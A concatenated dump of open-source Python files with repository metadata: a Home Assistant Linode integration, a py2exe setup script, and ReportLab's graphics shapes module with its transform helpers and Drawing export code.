"id": "ca0d6b683e8f3e91c8c54fdc9ddba8ebf4a2973a",
"size": "3576",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "16143"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "61219"
}
],
"symlink_target": ""
} |
"""
Support for Linode.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/linode/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import CONF_ACCESS_TOKEN
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['linode-api==4.1.9b1']

_LOGGER = logging.getLogger(__name__)

# State-attribute keys published by the binary_sensor/switch platforms.
ATTR_CREATED = 'created'
ATTR_NODE_ID = 'node_id'
ATTR_NODE_NAME = 'node_name'
ATTR_IPV4_ADDRESS = 'ipv4_address'
ATTR_IPV6_ADDRESS = 'ipv6_address'
ATTR_MEMORY = 'memory'
ATTR_REGION = 'region'
ATTR_VCPUS = 'vcpus'

CONF_NODES = 'nodes'

DATA_LINODE = 'data_li'
LINODE_PLATFORMS = ['binary_sensor', 'switch']
DOMAIN = 'linode'

# Throttle interval for Linode.update() below.
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=60)

CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Required(CONF_ACCESS_TOKEN): cv.string,
    }),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
    """Set up the Linode component."""
    import linode  # imported lazily so HA installs REQUIREMENTS first

    conf = config[DOMAIN]
    access_token = conf.get(CONF_ACCESS_TOKEN)

    _linode = Linode(access_token)

    try:
        # Cheap API call that both validates the token and logs who we are.
        _LOGGER.info("Linode Profile %s",
                     _linode.manager.get_profile().username)
    except linode.errors.ApiError as _ex:
        _LOGGER.error(_ex)
        return False

    # Shared client instance for the platform modules.
    hass.data[DATA_LINODE] = _linode

    return True
class Linode:
    """Handle all communication with the Linode API."""

    def __init__(self, access_token):
        """Initialize the Linode connection."""
        import linode

        self._access_token = access_token
        self.data = None  # latest list of instances, filled by update()
        self.manager = linode.LinodeClient(token=self._access_token)

    def get_node_id(self, node_name):
        """Return the id of the instance labelled *node_name* (None if absent)."""
        import linode
        node_id = None

        try:
            all_nodes = self.manager.linode.get_instances()
            for node in all_nodes:
                # If several instances share the label, the last match wins.
                if node_name == node.label:
                    node_id = node.id
        except linode.errors.ApiError as _ex:
            _LOGGER.error(_ex)

        return node_id

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    def update(self):
        """Refresh self.data from the Linode API (at most once per minute)."""
        import linode
        try:
            self.data = self.manager.linode.get_instances()
        except linode.errors.ApiError as _ex:
            _LOGGER.error(_ex)
| {
"content_hash": "02d91049672a8f0b729e48a1393c1284",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 75,
"avg_line_length": 24.908163265306122,
"alnum_prop": 0.6366243342892257,
"repo_name": "persandstrom/home-assistant",
"id": "c98ef16c7ed6672c6b730f708ce56816169f2faa",
"size": "2441",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "homeassistant/components/linode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1067"
},
{
"name": "Python",
"bytes": "11745210"
},
{
"name": "Ruby",
"bytes": "518"
},
{
"name": "Shell",
"bytes": "16652"
}
],
"symlink_target": ""
} |
# py2exe build script: `python setup.py py2exe` bundles mappy.py into a
# Windows console executable.
from distutils.core import setup
import py2exe

setup(console=['mappy.py'])
"content_hash": "86867d46e7a853371a07dd18f8f322d7",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 32,
"avg_line_length": 18.75,
"alnum_prop": 0.7866666666666666,
"repo_name": "kevinzhou96/15-112-Term-Project",
"id": "fdbb07f865107dd08b0f1261cc83bc8021bb7dc9",
"size": "75",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53857"
}
],
"symlink_target": ""
} |
"""
core of the graphics library - defines Drawing and Shapes
"""
__version__=''' $Id: shapes.py 3089 2007-05-23 11:45:58Z rgbecker $ '''
import string, os, sys
from math import pi, cos, sin, tan
from types import FloatType, IntType, ListType, TupleType, StringType, InstanceType
from pprint import pprint
from reportlab.platypus import Flowable
from reportlab.rl_config import shapeChecking, verbose, defaultGraphicsFontName, _unset_
from reportlab.lib import logger
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
from reportlab.lib.utils import fp_str
from reportlab.pdfbase.pdfmetrics import stringWidth
class NotImplementedError(Exception):
    # NOTE(review): shadows the builtin NotImplementedError; kept as-is
    # because callers elsewhere may catch this module-level name.
    pass
# two constants for filling rules
NON_ZERO_WINDING = 'Non-Zero Winding'
EVEN_ODD = 'Even-Odd'

## these can be overridden at module level before you start
#creating shapes.  So, if using a special color model,
#this provides support for the rendering mechanism.
#you can change defaults globally before you start
#making shapes; one use is to substitute another
#color model cleanly throughout the drawing.

# Default graphics state inherited by shapes that do not set their own.
STATE_DEFAULTS = {   # sensible defaults for all
    'transform': (1,0,0,1,0,0),

    # styles follow SVG naming
    'strokeColor': colors.black,
    'strokeWidth': 1,
    'strokeLineCap': 0,
    'strokeLineJoin': 0,
    'strokeMiterLimit' : 'TBA',  # don't know yet so let bomb here
    'strokeDashArray': None,
    'strokeOpacity': 1.0,  #100%

    'fillColor': colors.black,   #...or text will be invisible
    #'fillRule': NON_ZERO_WINDING, - these can be done later
    #'fillOpacity': 1.0, #100% - can be done later

    'fontSize': 10,
    'fontName': defaultGraphicsFontName,
    'textAnchor':  'start' # can be start, middle, end, inherited
    }
####################################################################
# math utilities. These could probably be moved into lib
# somewhere.
####################################################################
# constructors for matrices:
def nullTransform():
    "Return the identity affine transform as a 6-tuple."
    identity = (1, 0, 0, 1, 0, 0)
    return identity
def translate(dx, dy):
    "Affine 6-tuple that shifts points by (dx, dy)."
    return (1, 0, 0, 1) + (dx, dy)
def scale(sx, sy):
    "Affine 6-tuple scaling x by sx and y by sy."
    return (sx, 0, 0, sy) + (0, 0)
def rotate(angle):
    "Affine 6-tuple rotating counter-clockwise by *angle* degrees."
    radians = angle * pi / 180
    c = cos(radians)
    s = sin(radians)
    return (c, s, -s, c, 0, 0)
def skewX(angle):
    "Affine 6-tuple skewing parallel to the x axis by *angle* degrees."
    shear = tan(angle * pi / 180)
    return (1, 0, shear, 1, 0, 0)
def skewY(angle):
    "Affine 6-tuple skewing parallel to the y axis by *angle* degrees."
    shear = tan(angle * pi / 180)
    return (1, shear, 0, 1, 0, 0)
def mmult(A, B):
    "A postmultiplied by B"
    # Compose two 2D affine transforms (third matrix row implicitly [0 0 1]).
    a0, a1, a2, a3, a4, a5 = A
    b0, b1, b2, b3, b4, b5 = B
    return (a0 * b0 + a2 * b1,
            a1 * b0 + a3 * b1,
            a0 * b2 + a2 * b3,
            a1 * b2 + a3 * b3,
            a0 * b4 + a2 * b5 + a4,
            a1 * b4 + a3 * b5 + a5)
def inverse(A):
    "For A affine 2D represented as 6vec return 6vec version of A**(-1)"
    a0, a1, a2, a3, a4, a5 = A
    det = float(a0 * a3 - a2 * a1)
    # Invert the linear 2x2 part first...
    r0, r1, r2, r3 = a3 / det, -a1 / det, -a2 / det, a0 / det
    # ...then derive the translation that undoes (a4, a5) in the new basis.
    return (r0, r1, r2, r3,
            -r0 * a4 - r2 * a5,
            -r1 * a4 - r3 * a5)
def zTransformPoint(A, v):
    "Apply only the linear (non-translating) part of transform A to point v."
    vx, vy = v
    return (A[0] * vx + A[2] * vy, A[1] * vx + A[3] * vy)
def transformPoint(A, v):
    "Apply the full affine transform A (including translation) to point v."
    vx, vy = v
    return (A[0] * vx + A[2] * vy + A[4], A[1] * vx + A[3] * vy + A[5])
def transformPoints(matrix, V):
    """Apply affine *matrix* to every point in V --> [matrix*v for v in V].

    Bug fix: the original ignored *matrix* entirely (`map(transformPoint, V)`),
    calling transformPoint with a single argument, which raised TypeError for
    any non-empty V.  Mirrors zTransformPoints and returns a list.
    """
    return [transformPoint(matrix, v) for v in V]
def zTransformPoints(matrix, V):
    "Apply the linear (non-translating) part of *matrix* to every point in V."
    return [zTransformPoint(matrix, pt) for pt in V]
def _textBoxLimits(text, font, fontSize, leading, textAnchor, boxAnchor):
    # text is a list of strings (one per line).  Returns
    # (xb, yb, w, h, xt, yt): box origin, box size, and the first line's
    # text origin, all relative to the anchor point.
    w = 0
    for t in text:
        # Box width is the widest line at the given font/size.
        w = max(w,stringWidth(t,font, fontSize))

    h = len(text)*leading
    yt = fontSize
    # Vertical placement from the box anchor's first letter (n/s/middle).
    if boxAnchor[0]=='s':
        yb = -h
        yt = yt - h
    elif boxAnchor[0]=='n':
        yb = 0
    else:
        yb = -h/2.0
        yt = yt + yb

    # Horizontal placement from the box anchor's last letter (e/w/middle),
    # combined with the per-line text anchor (start/middle/end).
    if boxAnchor[-1]=='e':
        xb = -w
        if textAnchor=='end': xt = 0
        elif textAnchor=='start': xt = -w
        else: xt = -w/2.0
    elif boxAnchor[-1]=='w':
        xb = 0
        if textAnchor=='end': xt = w
        elif textAnchor=='start': xt = 0
        else: xt = w/2.0
    else:
        xb = -w/2.0
        if textAnchor=='end': xt = -xb
        elif textAnchor=='start': xt = xb
        else: xt = 0

    return xb, yb, w, h, xt, yt
def _rotatedBoxLimits(x, y, w, h, angle):
    '''
    Find the corner points of the rotated w x h sized box at x,y
    return the corner points and the min max points in the original space
    '''
    corners = zTransformPoints(rotate(angle),
                               ((x, y), (x + w, y), (x + w, y + h), (x, y + h)))
    xs = [pt[0] for pt in corners]
    ys = [pt[1] for pt in corners]
    return min(xs), max(xs), min(ys), max(ys), corners
class _DrawTimeResizeable:
    '''Addin class to provide the horribleness of _drawTimeResize'''
    def _drawTimeResize(self,w,h):
        # Resize the owning drawing while it is being rendered.  Only works
        # when a renderer has attached a _canvas to this shape; silently a
        # no-op otherwise.
        if hasattr(self,'_canvas'):
            canvas = self._canvas
            drawing = canvas._drawing
            drawing.width, drawing.height = w, h
            if hasattr(canvas,'_drawTimeResize'):
                canvas._drawTimeResize(w,h)
class _SetKeyWordArgs:
def __init__(self, keywords={}):
"""In general properties may be supplied to the constructor."""
for key, value in keywords.items():
setattr(self, key, value)
#################################################################
#
# Helper functions for working out bounds
#
#################################################################
def getRectsBounds(rectList):
    """Union of a list of (x1, y1, x2, y2) rects; None entries (e.g. empty
    groups) are ignored.  Returns None when nothing remains."""
    rects = [r for r in rectList if r is not None]
    if not rects:
        return None
    xMin, yMin, xMax, yMax = rects[0]
    for (x1, y1, x2, y2) in rects[1:]:
        xMin = min(xMin, x1)
        xMax = max(xMax, x2)
        yMin = min(yMin, y1)
        yMax = max(yMax, y2)
    return (xMin, yMin, xMax, yMax)
def getPathBounds(points):
    """Bounding box of a flat [x0, y0, x1, y1, ...] coordinate list."""
    xs = points[0::2]
    ys = points[1::2]
    return (min(xs), min(ys), max(xs), max(ys))
def getPointsBounds(pointList):
    "Helper function for list of points"
    # Accepts either a sequence of (x, y) pairs or a flat coordinate list;
    # the flat form is delegated to getPathBounds.
    first = pointList[0]
    if type(first) in (list, tuple):
        xs = [xy[0] for xy in pointList]
        ys = [xy[1] for xy in pointList]
        return (min(xs), min(ys), max(xs), max(ys))
    else:
        return getPathBounds(pointList)
#################################################################
#
# And now the shapes themselves....
#
#################################################################
class Shape(_SetKeyWordArgs,_DrawTimeResizeable):
    """Base class for all nodes in the tree. Nodes are simply
    packets of data to be created, stored, and ultimately
    rendered - they don't do anything active.  They provide
    convenience methods for verification but do not
    check attribute assignments or use any clever setattr
    tricks this time."""

    _attrMap = AttrMap()

    def copy(self):
        """Return a clone of this shape."""
        # implement this in the descendants as they need the right init methods.
        raise NotImplementedError, "No copy method implemented for %s" % self.__class__.__name__

    def getProperties(self,recur=1):
        """Interface to make it easy to extract automatic
        documentation"""
        #basic nodes have no children so this is easy.
        #for more complex objects like widgets you
        #may need to override this.
        props = {}
        for key, value in self.__dict__.items():
            # Underscore-prefixed attributes are private and not reported.
            if key[0:1] <> '_':
                props[key] = value
        return props

    def setProperties(self, props):
        """Supports the bulk setting of properties from,
        for example, a GUI application or a config file."""
        self.__dict__.update(props)
        #self.verify()

    def dumpProperties(self, prefix=""):
        """Convenience. Lists them on standard output.  You
        may provide a prefix - mostly helps to generate code
        samples for documentation."""
        propList = self.getProperties().items()
        propList.sort()
        if prefix:
            prefix = prefix + '.'
        for (name, value) in propList:
            print '%s%s = %s' % (prefix, name, value)

    def verify(self):
        """If the programmer has provided the optional
        _attrMap attribute, this checks all expected
        attributes are present; no unwanted attributes
        are present; and (if a checking function is found)
        checks each attribute.  Either succeeds or raises
        an informative exception."""
        if self._attrMap is not None:
            for key in self.__dict__.keys():
                if key[0] <> '_':
                    assert self._attrMap.has_key(key), "Unexpected attribute %s found in %s" % (key, self)
            for (attr, metavalue) in self._attrMap.items():
                assert hasattr(self, attr), "Missing attribute %s from %s" % (attr, self)
                value = getattr(self, attr)
                assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % (value, attr, self.__class__.__name__)

    if shapeChecking:
        """This adds the ability to check every attribute assignment as it is made.
        It slows down shapes but is a big help when developing. It does not
        get defined if rl_config.shapeChecking = 0"""
        def __setattr__(self, attr, value):
            """By default we verify.  This could be off
            in some parallel base classes."""
            validateSetattr(self,attr,value)    #from reportlab.lib.attrmap

    def getBounds(self):
        "Returns bounding rectangle of object as (x1,y1,x2,y2)"
        raise NotImplementedError("Shapes and widgets must implement getBounds")
class Group(Shape):
    """Groups elements together.  May apply a transform
    to its contents.  Has a publicly accessible property
    'contents' which may be used to iterate over contents.
    In addition, child nodes may be given a name in which
    case they are subsequently accessible as properties."""

    _attrMap = AttrMap(
        transform = AttrMapValue(isTransform,desc="Coordinate transformation to apply"),
        contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
        )

    def __init__(self, *elements, **keywords):
        """Initial lists of elements may be provided to allow
        compact definitions in literal Python code.  May or
        may not be useful."""

        # Groups need _attrMap to be an instance rather than
        # a class attribute, as it may be extended at run time.
        self._attrMap = self._attrMap.clone()
        self.contents = []
        self.transform = (1,0,0,1,0,0)
        for elt in elements:
            self.add(elt)
        # this just applies keywords; do it at the end so they
        # don't get overwritten
        _SetKeyWordArgs.__init__(self, keywords)

    def _addNamedNode(self,name,node):
        'if name is not None add an attribute pointing to node and add to the attrMap'
        if name:
            if name not in self._attrMap.keys():
                self._attrMap[name] = AttrMapValue(isValidChild)
            setattr(self, name, node)

    def add(self, node, name=None):
        """Appends non-None child node to the 'contents' attribute. In addition,
        if a name is provided, it is subsequently accessible by name
        """
        # propagates properties down
        if node is not None:
            assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
            self.contents.append(node)
            self._addNamedNode(name,node)

    def _nn(self,node):
        # add-and-return helper; used by code generated in _renderGroupPy.
        self.add(node)
        return self.contents[-1]

    def insert(self, i, n, name=None):
        'Inserts sub-node n in contents at specified location'
        if n is not None:
            assert isValidChild(n), "Can only insert Shape or UserNode objects in a Group"
            if i<0:
                self.contents[i:i] =[n]
            else:
                self.contents.insert(i,n)
            self._addNamedNode(name,n)

    def expandUserNodes(self):
        """Return a new object which only contains primitive shapes."""

        # many limitations - shared nodes become multiple ones,
        obj = isinstance(self,Drawing) and Drawing(self.width,self.height) or Group()
        obj._attrMap = self._attrMap.clone()
        if hasattr(obj,'transform'): obj.transform = self.transform[:]

        self_contents = self.contents
        a = obj.contents.append
        for child in self_contents:
            if isinstance(child, UserNode):
                newChild = child.provideNode()
            elif isinstance(child, Group):
                newChild = child.expandUserNodes()
            else:
                newChild = child.copy()
            a(newChild)

        self._copyNamedContents(obj)
        return obj

    def _explode(self):
        ''' return a fully expanded object'''
        from reportlab.graphics.widgetbase import Widget
        obj = Group()
        if hasattr(obj,'transform'): obj.transform = self.transform[:]
        P = self.contents[:]    # pending nodes
        while P:
            n = P.pop(0)
            if isinstance(n, UserNode):
                P.append(n.provideNode())
            elif isinstance(n, Group):
                n = n._explode()
                # Identity-transformed sub-groups are flattened into us.
                if n.transform==(1,0,0,1,0,0):
                    obj.contents.extend(n.contents)
                else:
                    obj.add(n)
            else:
                obj.add(n)
        return obj

    def _copyContents(self,obj):
        # Shallow copy: children are shared, not cloned.
        for child in self.contents:
            obj.contents.append(child)

    def _copyNamedContents(self,obj,aKeys=None,noCopy=('contents',)):
        from copy import copy
        self_contents = self.contents
        if not aKeys: aKeys = self._attrMap.keys()
        for (k, v) in self.__dict__.items():
            if v in self_contents:
                # Re-point named children at obj's corresponding contents entry.
                pos = self_contents.index(v)
                setattr(obj, k, obj.contents[pos])
            elif k in aKeys and k not in noCopy:
                setattr(obj, k, copy(v))

    def _copy(self,obj):
        """copies to obj"""
        obj._attrMap = self._attrMap.clone()
        self._copyContents(obj)
        self._copyNamedContents(obj)
        return obj

    def copy(self):
        """returns a copy"""
        return self._copy(self.__class__())

    def rotate(self, theta):
        """Convenience to help you set transforms"""
        self.transform = mmult(self.transform, rotate(theta))

    def translate(self, dx, dy):
        """Convenience to help you set transforms"""
        self.transform = mmult(self.transform, translate(dx, dy))

    def scale(self, sx, sy):
        """Convenience to help you set transforms"""
        self.transform = mmult(self.transform, scale(sx, sy))

    def skew(self, kx, ky):
        """Convenience to help you set transforms"""
        self.transform = mmult(mmult(self.transform, skewX(kx)),skewY(ky))

    def shift(self, x, y):
        '''Convenience function to set the origin arbitrarily'''
        self.transform = self.transform[:-2]+(x,y)

    def asDrawing(self, width, height):
        """ Convenience function to make a drawing from a group
            After calling this the instance will be a drawing!
        """
        self.__class__ = Drawing
        self._attrMap.update(self._xtraAttrMap)
        self.width = width
        self.height = height

    def getContents(self):
        '''Return the list of things to be rendered
        override to get more complicated behaviour'''
        b = getattr(self,'background',None)
        C = self.contents
        if b and b not in C: C = [b]+C
        return C

    def getBounds(self):
        if self.contents:
            b = []
            for elem in self.contents:
                b.append(elem.getBounds())
            x1 = getRectsBounds(b)
            if x1 is None: return None
            x1, y1, x2, y2 = x1
            trans = self.transform
            # Transform all four corners; the axis-aligned bounds of the
            # result are the group's bounds in parent coordinates.
            corners = [[x1,y1], [x1, y2], [x2, y1], [x2,y2]]
            newCorners = []
            for corner in corners:
                newCorners.append(transformPoint(trans, corner))
            return getPointsBounds(newCorners)
        else:
            #empty group needs a sane default; this
            #will happen when interactively creating a group
            #nothing has been added to yet.  The alternative is
            #to handle None as an allowed return value everywhere.
            return None
def _addObjImport(obj, I, n=None):
    '''add an import of obj's class to a dictionary of imports''' #'
    from inspect import getmodule
    klass = obj.__class__
    module_name = getmodule(klass).__name__
    symbol = n or klass.__name__
    names = I.get(module_name)
    if names is None:
        I[module_name] = [symbol]
    elif symbol not in names:
        names.append(symbol)
def _repr(self,I=None):
    '''return a repr style string with named fixed args first, then keywords'''
    # I, when given, is a dict of module -> [names] collecting the imports
    # needed to evaluate the generated source (see _addObjImport).
    if type(self) is InstanceType:
        if self is EmptyClipPath:
            _addObjImport(self,I,'EmptyClipPath')
            return 'EmptyClipPath'
        if I: _addObjImport(self,I)
        if isinstance(self,Shape):
            from inspect import getargs
            # Positional args of __init__ (minus self) are emitted first...
            args, varargs, varkw = getargs(self.__init__.im_func.func_code)
            P = self.getProperties()
            s = self.__class__.__name__+'('
            for n in args[1:]:
                v = P[n]
                del P[n]
                s = s + '%s,' % _repr(v,I)
            # ...then everything else as keyword arguments.
            for n,v in P.items():
                v = P[n]
                s = s + '%s=%s,' % (n, _repr(v,I))
            return s[:-1]+')'
        else:
            return repr(self)
    elif type(self) is FloatType:
        return fp_str(self)
    elif type(self) in (ListType,TupleType):
        s = ''
        for v in self:
            s = s + '%s,' % _repr(v,I)
        if type(self) is ListType:
            return '[%s]' % s[:-1]
        else:
            # One-element tuples need the trailing comma to stay tuples.
            return '(%s%s)' % (s[:-1],len(self)==1 and ',' or '')
    else:
        return repr(self)
def _renderGroupPy(G,pfx,I,i=0,indent='\t\t'):
    # Emit Python source that rebuilds group G's contents; pfx is the
    # variable name the generated code adds to, I collects needed imports.
    s = ''
    C = getattr(G,'transform',None)
    if C: s = s + ('%s%s.transform = %s\n' % (indent,pfx,_repr(C)))
    C  = G.contents
    for n in C:
        if isinstance(n, Group):
            # Nested groups get a fresh local name vN and recurse.
            npfx = 'v%d' % i
            i = i + 1
            s = s + '%s%s=%s._nn(Group())\n' % (indent,npfx,pfx)
            s = s + _renderGroupPy(n,npfx,I,i,indent)
            i = i - 1
        else:
            s = s + '%s%s.add(%s)\n' % (indent,pfx,_repr(n,I))
    return s
def _extraKW(self,pfx,**kw):
kw.update(self.__dict__)
R = {}
n = len(pfx)
for k in kw.keys():
if k.startswith(pfx):
R[k[n:]] = kw[k]
return R
class Drawing(Group, Flowable):
    """Outermost container; the thing a renderer works on.
    This has no properties except a height, width and list
    of contents."""

    # Filename extensions recognised (and stripped) by save().
    _saveModes=(
            'pdf','ps','eps','gif','png','jpg','jpeg','pct',
            'pict','tiff','tif','py','bmp','svg','tiffp',
            )

    _xtraAttrMap = AttrMap(
        width = AttrMapValue(isNumber,desc="Drawing width in points."),
        height = AttrMapValue(isNumber,desc="Drawing height in points."),
        canv = AttrMapValue(None),
        background = AttrMapValue(isValidChildOrNone,desc="Background widget for the drawing"),
        hAlign = AttrMapValue(OneOf("LEFT", "RIGHT", "CENTER", "CENTRE"), desc="Horizontal alignment within parent document"),
        vAlign = AttrMapValue(OneOf("TOP", "BOTTOM", "CENTER", "CENTRE"), desc="Vertical alignment within parent document"),
        #AR temporary hack to track back up.
        #fontName = AttrMapValue(isStringOrNone),
        renderScale = AttrMapValue(isNumber,desc="Global scaling for rendering"),
        )

    _attrMap = AttrMap(BASE=Group)
    _attrMap.update(_xtraAttrMap)

    def __init__(self, width=400, height=200, *nodes, **keywords):
        self.background = None
        apply(Group.__init__,(self,)+nodes,keywords)
        self.width = width
        self.height = height
        self.hAlign = 'LEFT'
        self.vAlign = 'BOTTOM'
        self.renderScale = 1.0

    def _renderPy(self):
        # Generate standalone Python source that recreates this drawing
        # (used by the guiedit tool and the 'py' save format).
        I = {'reportlab.graphics.shapes': ['_DrawingEditorMixin','Drawing','Group']}
        G = _renderGroupPy(self._explode(),'self',I)
        n = 'ExplodedDrawing_' + self.__class__.__name__
        s = '#Autogenerated by ReportLab guiedit do not edit\n'
        for m, o in I.items():
            s = s + 'from %s import %s\n' % (m,string.replace(str(o)[1:-1],"'",""))
        s = s + '\nclass %s(_DrawingEditorMixin,Drawing):\n' % n
        s = s + '\tdef __init__(self,width=%s,height=%s,*args,**kw):\n' % (self.width,self.height)
        s = s + '\t\tapply(Drawing.__init__,(self,width,height)+args,kw)\n'
        s = s + G
        s = s + '\n\nif __name__=="__main__": #NORUNTESTS\n\t%s().save(formats=[\'pdf\'],outDir=\'.\',fnRoot=None)\n' % n
        return s

    def draw(self,showBoundary=_unset_):
        """This is used by the Platypus framework to let the document
        draw itself in a story.  It is specific to PDF and should not
        be used directly."""
        import renderPDF
        renderPDF.draw(self, self.canv, 0, 0, showBoundary=showBoundary)

    def wrap(self, availWidth, availHeight):
        # Flowable protocol: report the space this drawing will occupy.
        width = self.width
        height = self.height
        renderScale = self.renderScale
        if renderScale!=1.0:
            width *= renderScale
            height *= renderScale
        return width, height

    def expandUserNodes(self):
        """Return a new drawing which only contains primitive shapes."""
        obj = Group.expandUserNodes(self)
        obj.width = self.width
        obj.height = self.height
        return obj

    def copy(self):
        """Returns a copy"""
        return self._copy(self.__class__(self.width, self.height))

    def asGroup(self,*args,**kw):
        # Shallow-copy this drawing's contents into a plain Group.
        return self._copy(apply(Group,args,kw))

    def save(self, formats=None, verbose=None, fnRoot=None, outDir=None, title='', **kw):
        """Saves copies of self in desired location and formats.
        Multiple formats can be supported in one call

        the extra keywords can be of the form
        _renderPM_dpi=96 (which passes dpi=96 to renderPM)
        """
        from reportlab import rl_config
        ext = ''
        if not fnRoot:
            # Default filename pattern may be a callable or a %-format string.
            fnRoot = getattr(self,'fileNamePattern',(self.__class__.__name__+'%03d'))
            chartId = getattr(self,'chartId',0)
            if callable(fnRoot):
                fnRoot = fnRoot(chartId)
            else:
                try:
                    fnRoot = fnRoot % getattr(self,'chartId',0)
                except TypeError, err:
                    #the exact error message changed from 2.2 to 2.3 so we need to
                    #check a substring
                    if str(err).find('not all arguments converted') < 0: raise

        if os.path.isabs(fnRoot):
            outDir, fnRoot = os.path.split(fnRoot)
        else:
            outDir = outDir or getattr(self,'outDir','.')
        outDir = outDir.rstrip().rstrip(os.sep)
        if not outDir: outDir = '.'
        if not os.path.isabs(outDir): outDir = os.path.join(getattr(self,'_override_CWD',os.path.dirname(sys.argv[0])),outDir)
        if not os.path.isdir(outDir): os.makedirs(outDir)
        fnroot = os.path.normpath(os.path.join(outDir,fnRoot))
        plotMode = os.path.splitext(fnroot)
        # Strip a recognised extension so each format appends its own.
        if string.lower(plotMode[1][1:]) in self._saveModes:
            fnroot = plotMode[0]

        plotMode = map(str.lower,formats or getattr(self,'formats',['pdf']))
        verbose = (verbose is not None and (verbose,) or (getattr(self,'verbose',verbose),))[0]
        # Temporarily tie once-only logging to the verbose flag; restored below.
        _saved = logger.warnOnce.enabled, logger.infoOnce.enabled
        logger.warnOnce.enabled = logger.infoOnce.enabled = verbose
        if 'pdf' in plotMode:
            from reportlab.graphics import renderPDF
            filename = fnroot+'.pdf'
            if verbose: print "generating PDF file %s" % filename
            renderPDF.drawToFile(self, filename, title, showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPDF_',**kw))
            ext = ext +  '/.pdf'
            if sys.platform=='mac':
                # Classic MacOS: set creator/type so the Finder opens it in Acrobat.
                import macfs, macostools
                macfs.FSSpec(filename).SetCreatorType("CARO", "PDF ")
                macostools.touched(filename)

        for bmFmt in ['gif','png','tif','jpg','tiff','pct','pict', 'bmp','tiffp']:
            if bmFmt in plotMode:
                from reportlab.graphics import renderPM
                filename = '%s.%s' % (fnroot,bmFmt)
                if verbose: print "generating %s file %s" % (bmFmt,filename)
                renderPM.drawToFile(self, filename,fmt=bmFmt,showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPM_',**kw))
                ext = ext + '/.' + bmFmt

        if 'eps' in plotMode:
            try:
                from rlextra.graphics import renderPS_SEP as renderPS
            except ImportError:
                from reportlab.graphics import renderPS
            filename = fnroot+'.eps'
            if verbose: print "generating EPS file %s" % filename
            renderPS.drawToFile(self,
                                filename,
                                title = fnroot,
                                dept = getattr(self,'EPS_info',['Testing'])[0],
                                company = getattr(self,'EPS_info',['','ReportLab'])[1],
                                preview = getattr(self,'preview',rl_config.eps_preview),
                                showBoundary=getattr(self,'showBorder',rl_config.showBoundary),
                                ttf_embed=getattr(self,'ttf_embed',rl_config.eps_ttf_embed),
                                **_extraKW(self,'_renderPS_',**kw))
            ext = ext + '/.eps'

        if 'svg' in plotMode:
            from reportlab.graphics import renderSVG
            filename = fnroot+'.svg'
            # NOTE(review): message says "EPS" but this branch writes SVG.
            if verbose: print "generating EPS file %s" % filename
            renderSVG.drawToFile(self,
                                filename,
                                showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderSVG_',**kw))
            ext = ext + '/.svg'

        if 'ps' in plotMode:
            from reportlab.graphics import renderPS
            filename = fnroot+'.ps'
            # NOTE(review): message says "EPS" but this branch writes PS.
            if verbose: print "generating EPS file %s" % filename
            renderPS.drawToFile(self, filename, showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPS_',**kw))
            ext = ext + '/.ps'

        if 'py' in plotMode:
            filename = fnroot+'.py'
            if verbose: print "generating py file %s" % filename
            open(filename,'w').write(self._renderPy())
            ext = ext + '/.py'
        logger.warnOnce.enabled, logger.infoOnce.enabled = _saved
        if hasattr(self,'saveLogger'):
            self.saveLogger(fnroot,ext)
        # e.g. returns 'chart001/.pdf/.png' style summary, '' if nothing written.
        return ext and fnroot+ext[1:] or ''

    def asString(self, format, verbose=None, preview=0):
        """Converts to an 8 bit string in given format."""
        assert format in ['pdf','ps','eps','gif','png','jpg','jpeg','bmp','ppm','tiff','tif','py','pict','pct','tiffp'], 'Unknown file format "%s"' % format
        from reportlab import rl_config
        #verbose = verbose is not None and (verbose,) or (getattr(self,'verbose',verbose),)[0]
        if format == 'pdf':
            from reportlab.graphics import renderPDF
            return renderPDF.drawToString(self)
        elif format in ['gif','png','tif','tiff','jpg','pct','pict','bmp','ppm','tiffp']:
            from reportlab.graphics import renderPM
            return renderPM.drawToString(self, fmt=format)
        elif format == 'eps':
            try:
                from rlextra.graphics import renderPS_SEP as renderPS
            except ImportError:
                from reportlab.graphics import renderPS

            return renderPS.drawToString(self,
                                preview = preview,
                                showBoundary=getattr(self,'showBorder',rl_config.showBoundary))
        elif format == 'ps':
            from reportlab.graphics import renderPS
            return renderPS.drawToString(self, showBoundary=getattr(self,'showBorder',rl_config.showBoundary))
        elif format == 'py':
            return self._renderPy()
class _DrawingEditorMixin:
    '''This is a mixin to provide functionality for edited drawings'''
    def _add(self,obj,value,name=None,validate=None,desc=None,pos=None):
        '''
        effectively setattr(obj,name,value), but takes care of things with _attrMaps etc
        '''
        ivc = isValidChild(value)
        if name and hasattr(obj,'_attrMap'):
            # Make sure obj has its own _attrMap before extending it.
            if not obj.__dict__.has_key('_attrMap'):
                obj._attrMap = obj._attrMap.clone()
            if ivc and validate is None: validate = isValidChild
            obj._attrMap[name] = AttrMapValue(validate,desc)
